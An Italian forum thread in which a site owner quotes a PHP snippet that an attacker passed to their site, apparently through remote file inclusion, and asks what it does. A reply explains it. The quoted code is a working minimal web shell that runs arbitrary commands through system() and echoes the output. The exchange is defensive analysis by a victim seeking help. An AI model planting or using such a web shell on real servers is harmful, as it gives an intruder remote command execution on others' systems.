Originariamente inviato da pacovox
Dalle statistiche ho visto che qualcuno è entrato nel mio sito passando come variabile uno script in php così fatto:
codice:
</center><font size="2"><pre>


bash-2.05# <?
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  $output = str_replace("\n","\nbash-2.05# ",$output);
  if (!empty($output)) echo  str_replace(">", "&gt;", str_replace("<", "&lt;", $output));

?>
</pre>
<? die(); ?>
Vorrei capire questo furbone cosa ha fatto o cercato di fare.
Qualcuno potrebbe darmi delle delucidazioni e magari che accorgimenti adottare?
Grazie
semplice ha provato a lanciare il comando $cmd, che non so cosa contiene, dopo di che ha inviato il contenuto a /tmp/cmdtemp e gli errori sempre li
dopo di che ha stampato il contenuto di cmdtemp e poi lo ha eliminato
nel frattempo ha stampato il codice a video eliminando i dati che non gli interessavano e a questo punto ha sostituito a < e > i rispettivi codici html

SICURAMENTE $chdir e $cmd erano parametri passati dalla stringa di comando ^^
ti conviene vedere cosa ha passato, anche per sapere quanto ti devi allarmare